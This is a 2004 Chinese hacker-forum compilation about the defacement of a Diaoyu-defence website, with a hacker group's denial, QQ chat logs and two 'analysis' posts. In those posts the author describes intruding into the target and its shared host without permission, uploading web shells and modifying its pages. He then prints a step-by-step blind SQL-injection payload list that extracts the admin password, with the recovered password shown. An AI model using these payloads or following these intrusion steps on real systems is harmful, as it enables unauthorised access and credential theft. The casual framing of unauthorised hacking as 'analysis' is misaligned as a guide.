事件纵览,以作保留!
学生联盟:关于中国保钓网被黑一事声明
以下内容为学盟发表的公告:
首先我声明保钓网2004-10-06 16:59:24被黑一事与中国大学生黑客联盟无任何关系.在www.cnbd.com/bbs上所有文字(::网站有漏洞,怎么还不补上呢?会被人家给黑的!哎!郁闷了哈哈!欢迎 大家光临我的小站!中国学生黑客联盟 www.stuhack.cn: 有空大家 来看看。欢迎你门测试!嘿嘿!中国学生黑客联盟 qq:295461:BY: Crazy QQ:699177 )都由小将一人所写.本人未参与此事.
有如下证据:
(2004-10-06 16:52:53) 小将
www.cnbd.org
中国保钓网村在漏洞!
(2004-10-06 16:56:45) 学生黑客联盟
扯淡。。
(2004-10-06 16:55:04) 小将
不信?
(2004-10-06 16:55:15) 小将
那我挂你门站的名字好了
(2004-10-06 16:57:14) 学生黑客联盟
可拉倒吧你。。。
(2004-10-06 16:55:24) 小将
你等着
(2004-10-06 16:57:29) 学生黑客联盟
你不会玩真的吧
(2004-10-06 16:56:00) 小将
是的饿
(2004-10-06 16:56:04) 小将
你等着 (2004-10-06 16:59:24) 小将
http://www.cnbd.org/index.asp ;
(2004-10-06 16:59:26) 小将
看!
(2004-10-06 16:59:53) 小将
中国报钓网被黑!希望弄个截图!http://www.cnbd.org/index.asp ;
...........
全部内容我保存起来了如果需要可以当证据!
我只是想证明我和此事无关 纯属陷害。请保钓网的管理员查清此事!
学生黑客2004 10 6 |
当前首页已经被改成“我操你妈小将~~~你他妈的去别处疯去这里轮不到你说话 妈的,谁他妈是小将,看你就不爽.BY 鱼”。
另外,网管员你也就放假了!真的是相安无事吗?!没有那个技术实力就不要搞什么政治站点,丢不起那人!
对保钓网被黑的简单分析
刚才看到学盟发表的公告,打开保钓网的页面,看到被黑的内容。
本来打算睡觉的,既然看到重要消息,还是再晚点吧!刚好阿道也在,就一起分析一下吧。打开google搜一下asp,随便进入一个页,跳过首页,可以看到网站的实际内容,大概的测试了一下,发现数据传递都作了过滤,被注入的可能性不大!在找找,看到后台页http://www.cnbd.org/admin/admin_login.asp,利索网络?那就搜搜利索网络吧,http://www.lisuo.net/,进入http://www.lisuo.net/web.asp可以看到保钓网。
既然是这样,那么就可能是虚拟主机。因为从首页直接被改来看,应该是通过asp马干的吧。whois一下,能够找到很多指向这个ip的站,大致分析了看了几个,除了有几个动网7sp2sql版以外,还有很多站有注入漏洞,简单测试了一下,可以获得后台用户和密码,有的是经过md5加密的,有的是没加密的;登陆后传个马,可以获得一些相关信息,管理员还是做了一些权限设置,而且日志文件应该单独处理了。
看看阿道那边,也获得了类似权限,不过不是利用同一站,就在我们测试的时候,居然还有人登陆在3389上,呵呵!也不知道是不是管理员!
| TCP 218.30.122.61:3389 218.5.24.129:61598 ESTABLISHED | 当然还可以获得更多的信息,包括ftp和pcanywhere什么的,不过没有心思继续搞了,删除掉上传的马后,退出后台,前后大概用了有30分钟时间。
综上所述,保钓网被黑应该是利用同一服务器上其他网站的问题,作为一个政治站点,完全可以制作成html的,为什么一定要用asp?就算用了asp是不是在保证其自身安全的情况,保证服务器安全。就服务器而言,里面那么多系统用户,还开着3389,而且还没有限制连接的ip,如何保证安全。
还是那句话:没有那个技术实力就不要搞什么政治站点,丢不起那人!
保钓网被黑再分析
今天凌晨简单分析了保钓网被黑的原因,文章被转载到黑基后,有网友回复“笑死了”,估计是我分析的不对!呵呵
中午见到大学生黑客联盟的站长,要了个第一次被黑的截图,因为没有经过他的同意,我就不发布出来了。说到这里,我就闲扯两句。
就我个人对学盟站长的了解,以及学盟的公告,我觉得是学盟的可能性太小,平心而论,估计国内敢黑了保钓网而把自己组织及qq号留下的不多!而从早上开始学盟的网站http://www.stuhack.com/就被dos,我分析有两种可能性,一种是那个小将攻击学盟,让别人看不到学盟的公告?不太可能吧!那么就剩下出于爱国心,攻击学盟的了,我欣赏你们的爱国激情,但是是不是应该仔细考虑一下再攻击呢?好了,言归正传,还是来说保钓网被黑的事情。
在学盟站长给我的截图看,页面路径是http://www.cnbd.org/bbs,也就是第一次被黑的页;而我在多次向另外一个当事者确认入侵方法的时候,一直没有得到明确答复,每个人都有些自己的一些难言之隐,我也不方便勉强人家。看来还是自己分析一下吧,本来下午要去见客户的,推掉了!
打开http://www.cnbd.org/bbs,黑页,截图如下:
根据当前状况,我决定把分析重点放在保钓网内部,确切的说,凌晨在分析的时候,简单测试了一下,自我感觉应该不会存在程序漏洞,就把重点放在了网站外部,当然也拿到了一些权限,只要有时间,还是可以入侵的。
测试了几个页面
http://www.cnbd.org/bbs/login.asp
http://www.cnbd.org/bbs/list.asp?boardid=2
http://www.cnbd.org/bbs/admin_index.asp
都反馈“数据库连接出错,请检查连接字串。”
http://www.cnbd.org/bbs/conn.asp
Microsoft VBScript 运行时错误 错误 ’800a01f4’
变量未定义: ’Cls_Forum’
/bbs/conn.asp,行17 | 应该是动网的坛子,但是数据库连接都失败了,而且前台页面的论坛连接都是失效的,看来继续测试意义不大;回到前台,分析页面参数的传递,作了一些过滤,注入的可能性不太大;无意看到了站内搜索部分“搜索文章”,简单测试,反馈
Microsoft JET Database Engine 错误 ’80040e14’
语法错误 在查询表达式 ’istop=0 and isNews=0 and Title like ’%’%’ order by News_id desc’ 中。
/newsMore.asp,行56 | 对注入熟悉点的,都知道问题了吧,我就不详细说了,没什么技术含量,另外会教坏小孩子。获得后台权限,登陆后台截图如下:
接着就下班了,刚好朋友明天去上海,还要饯行,剩下的是阿道作的,拿了个webshell,细节我就不多说了。
大概管理员被炒了,要不就是国庆放假放的太爽了,这么长时间也不恢复,都是干什么吃的!还是我来帮你吧,恢复index.asp,因为没有原文件,就把xiaoshi.asp拷贝了一份给index.asp,总比原来好点吧;恢复bbs/index.asp,留了一句“论坛维护中... ”。恢复后截图如下:
上传的东西我已经清理干净了,剩下的就是管理员的事情了!希望你早点收假回来!另外拜托那些比较无聊的小朋友,如果有兴趣去搞搞“靖国神社”什么的,别拿自己的站点开涮,除了显示的浅薄之外,不会给别人留下任何印象!
我不知道前面的的是不是通过这个漏洞实现的,据学盟站长说可能是通过bbs作的,为了不挨骂,我就不肯定也不应该了,呵呵!毕竟没有得到原始的入侵过程,不敢断定了!
再次感谢阿道与无言的帮助!
酷客天堂--用我们的双手撑起中国网络安全的一片天空!
注入代码
’ and (select count(*) from admin)>=0 and ’%’=’
’ and (select count(username) from admin)>=0 and ’%’=’
’ and (select count(password) from admin)>=0 and ’%’=’
’ and (select top 1 len(username) from admin)=5 and ’%’=’
’ and (select top 1 username from admin)=’admin’ and ’%’=’
’ and (select len(password) from admin where username=’admin’)>2 and ’%’=’
’ and (select len(password) from admin where username=’admin’)=5 and ’%’=’
’ and (select asc(mid(password,1,1)) from admin where username=’admin’)>100 and ’%’=’
’ and (select asc(mid(password,1,1)) from admin where username=’admin’)=108 and ’%’=’
l
’ and (select asc(mid(password,2,1)) from admin where username=’admin’)>100 and ’%’=’
’ and (select asc(mid(password,2,1)) from admin where username=’admin’)=105 and ’%’=’
i
’ and (select asc(mid(password,3,1)) from admin where username=’admin’)>100 and ’%’=’
’ and (select asc(mid(password,3,1)) from admin where username=’admin’)=115 and ’%’=’
s
’ and (select asc(mid(password,4,1)) from admin where username=’admin’)>100 and ’%’=’
’ and (select asc(mid(password,4,1)) from admin where username=’admin’)=117 and ’%’=’
u
’ and (select asc(mid(password,5,1)) from admin where username=’admin’)>100 and ’%’=’
’ and (select asc(mid(password,5,1)) from admin where username=’admin’)=111 and ’%’=’
o
lisuo |
聊天记录,我撤销站内文章的原因
2004-10-09 20:11:33 豬 豬
麻烦你一件事可以不
2004-10-09 20:06:54 阿酷
吃饭中,等会说?
要不你留下话
2004-10-09 20:13:31 豬 豬
你可以不可以把小将黑保掉的文章删掉?
2004-10-09 20:08:49 阿酷
那个文章?
2004-10-09 20:14:38 豬 豬
就是小将黑保掉的那个。
2004-10-09 20:15:45 阿酷
在我的网站?
2004-10-09 20:21:48 豬 豬
恩。
2004-10-09 20:18:18 阿酷
http://www.coolersky.com/web/news/20041008024527.asp
这个 页面?
2004-10-09 20:24:26 豬 豬
关于保掉的可以删掉吗?
2004-10-09 20:20:00 阿酷
好的
我可以全部删除掉
不过是不是给我个理由?
2004-10-09 20:27:33 豬 豬
因为我已经把小将给教训了。
他说不想搞大了。。。
所以求我跟你说一下。
让你放过他
2004-10-09 20:24:11 阿酷
哦
没有问题
你的意思把以下三个文章删除掉?
http://www.coolersky.com/web/news/20041008024527.asp
http://www.coolersky.com/web/news/20041008044828.asp
http://www.coolersky.com/web/news/20041009003823.asp ;
2004-10-09 20:31:22 豬 豬
恩。。。。谢拉。。。兄弟
2004-10-09 20:26:51 阿酷
ok
我本来也没有难为他的意思!
就着样
2004-10-09 20:32:24 豬 豬
呵呵。
2004-10-09 20:31:28 阿酷
ok 了
其他站上的转载我可关不了了哦!
2004-10-09 20:41:52 豬 豬
[表情]
2004-10-09 21:57:29 阿酷
10以后的pcanywhere的配置文件能破?
2004-10-09 22:06:08 阿酷
http://www.syue.com/default.asp?viewType=byCate&cateID=13 ;
2004-10-09 22:16:12 豬 豬
怎么了?
这个站。明天或者今天晚上就换了。
2004-10-09 22:11:30 阿酷
哦
(2004-10-09 21:57:29) 阿酷
10以后的pcanywhere的配置文件能破?
2004-10-09 22:20:13 豬 豬
呵呵。等一会说。等我把事搞好啊。
2004-10-09 22:15:14 阿酷
ok
2004-10-10 00:30:25 阿酷
还在忙?
2004-10-10 00:35:59 豬 豬
是的啊 。
2004-10-10 00:30:59 阿酷
我睡觉了
会见
2004-10-10 00:37:09 豬 豬
恩。
2004-10-09 20:44:59 阿酷
在/
2004-10-09 22:54:58 学生黑客联盟
在啊
2004-10-09 22:46:31 阿酷
==tel 中
2004-10-09 22:49:04 阿酷
我把我站上关于保钓的删除了
因为猪猪和小将的师父 &7xi.Fox ﹖说话了
2004-10-09 22:59:34 学生黑客联盟
呵无所谓了,,我过会也删了。。
2004-10-09 22:50:43 阿酷
你和小将有过节?
2004-10-09 23:01:20 学生黑客联盟
没有。那小子想害我。。。我也不能这样受着
2004-10-09 22:53:03 阿酷
哦
呵呵
2004-10-09 23:02:41 学生黑客联盟
那小子找他师傅去了啊?有这么严重吗
2004-10-09 22:55:03 阿酷
是啊
猪猪好像也跟fox认识
我本来也没有要通过这个事情达到什么目的
所以我就删除了
2004-10-09 23:05:40 学生黑客联盟
那个fox是不是新疆那个?
2004-10-09 22:56:55 阿酷
不清楚
不过看ip好像是青岛的
2004-10-09 23:06:34 学生黑客联盟
把他的QQ给我
2004-10-09 22:57:56 阿酷
67177777
2004-10-09 23:07:39 学生黑客联盟
他啊。。和我们小白的QQ号相似那个
2004-10-09 22:59:39 阿酷
他说他是
小将也说是他
2004-10-09 23:09:13 学生黑客联盟
操。自己做的事还怕啊
2004-10-09 23:00:48 阿酷
(2004-10-09 20:43:53) 269716988
恩!那好的!我这几天害怕了!真是郁闷死哦
(2004-10-09 20:42:09) 269716988
先不说了!这几天没睡好!郁闷
2004-10-09 23:01:03 阿酷
我觉得也没必要太过责备了吧
2004-10-09 23:10:20 学生黑客联盟
把所有的东西都删了。。。
2004-10-09 23:12:05 阿酷
/images/record/2005/0928/140516207.jpg
看看为什么少了2个标签
2004-10-09 19:58:49 &7xi.Fox ﹖
我想第一句话该说 您好~
2004-10-09 19:58:53 阿酷
客气
2004-10-09 19:59:01 阿酷
有事?
2004-10-09 19:59:09 &7xi.Fox ﹖
加你 不谈技术 只谈你的分析
2004-10-09 19:59:17 阿酷
good!
2004-10-09 20:00:03 &7xi.Fox ﹖
小将是我一手带出来的 他的这次行为 我想我该负些责任
2004-10-09 20:00:34 阿酷
哦
我喜欢敢于负责人的人
2004-10-09 20:01:39 &7xi.Fox ﹖
保钓被黑的前一分钟 我在忙 所以小将给我的QQ信息 我没看到 对于一个民间的爱国组织被黑 我心里多少有些惭愧 虽然不是我做出来的 可是毕竟小将和我有关系
2004-10-09 20:02:58 阿酷
事情已经发生了 ,我想再谈这个意义已经不大!
但是作为网络技术爱好者,有一些起码的行为标准还是很重要的!你说呢?
2004-10-09 20:04:35 &7xi.Fox ﹖
同意 可是人各有志 无论在这个圈子做 黑 还是做 白~~
都是以技术为基础 当初小将跟我的时候 我也讲过 我们一起探讨技术 就相当于每个人手里一把刀一样 至于拿这把刀做什么 那就看个人的行为了~~
2004-10-09 20:06:29 阿酷
没错!
我倒是不太关注作黑还是作白
即使你作黑,只要不是太过分就好,毕竟还是年青
谁不是这样过来的
2004-10-09 20:08:27 &7xi.Fox ﹖
年轻 趁着有梦想 做些自己喜欢的事情 毕竟每个人做站都不容易 更何况是个许多中国人关注的组织~~ 这次被黑 先暂且不谈你分析的结果 我觉得 做为一个中国人 你做到了自己该做的 能公开站出来评论 现在说结果 其实每个人的思路都不一样 我想你发表评论的时候 也不会想到存在Upfile.asp 这个严重的低级漏洞 事实上 当时确实存在
2004-10-09 20:10:13 &7xi.Fox ﹖
人都是这样 越简单的 越不愿意去想 觉得不可能
当然 你的分析结果也是很有价值的
2004-10-09 20:10:55 阿酷
恩
这个我也想到了
只是当时测试的时候,看不到论坛页,以为论坛早就停掉了的
知道看到黑页,才往保钓网自身问题去想的
2004-10-09 20:11:52 阿酷
我得分析,纯属一家之言,仅是自己的一点看法,不值得多看
2004-10-09 20:13:43 &7xi.Fox ﹖
结果怎样不重要 事实上确实已经被黑了
可你的想法还是很值得大家学习的
毕竟在这个时候你能站出来 而别人却没有
2004-10-09 20:15:04 阿酷
。。。
这个不说了
份内之事
2004-10-09 20:15:48 &7xi.Fox ﹖
分析的错也好 对也好 重要的是精神
这次的事 其实我本不想叫他发生 无论小将与学生黑客联盟有什么过节 我想这次的事情到此为止 如果信的过我 我可以担保小将以后不会再做出类似的事情 毕竟他曾喊过我大哥~~ 我想该说声 对不起~~
2004-10-09 20:16:18 &7xi.Fox ﹖
希望大家能给小将以原谅 而不是谴责 <个人看法>
2004-10-09 20:17:37 阿酷
我想小将能有你这样的老师,是他的福气
我不会谴责,更谈不上原谅不原谅
我本来也没有说过他什么 O
2004-10-09 20:32:23 &7xi.Fox ﹖
我不在.
有事请留言~~
2004-10-09 20:32:21 阿酷
豬 豬 20:27:33 因为我已经把小将给教训了。 他说不想搞大了。。。 所以求我跟你说一下。 让你放过他 阿酷 20:24:11 哦 没有问题 你的意思把以下三个文章删除掉? http://www.coolersky.com/web/news/20041008024527.asp
http://www.coolersky.com/web/news/20041008044828.asp ;
http://www.coolersky.com/web/news/20041009003823.asp ;
豬 豬 20:31:22 恩。。。。谢拉。。。兄弟
阿酷 20:26:47 ok 我本来也没有难为他的意思皸?
2004-10-09 20:40:04 269716988
呵呵!不要在报道了好不?
2004-10-09 20:38:26 阿酷
我已经全部删除了
你自己去我得站上看!
2004-10-09 20:38:39 阿酷
三个文章,我都删除了
2004-10-09 20:40:48 269716988
那就可以了!这下那个黑基也没话了
2004-10-09 20:39:34 阿酷
呵呵
黑基那边你跟谁联系的啊
2004-10-09 20:42:09 269716988
先不说了!这几天没睡好!郁闷
2004-10-09 20:41:02 阿酷
你休息吧
如果黑基那边有问题,我给他们说
2004-10-09 20:43:53 269716988
恩!那好的!我这几天害怕了!真是郁闷死哦 | | 
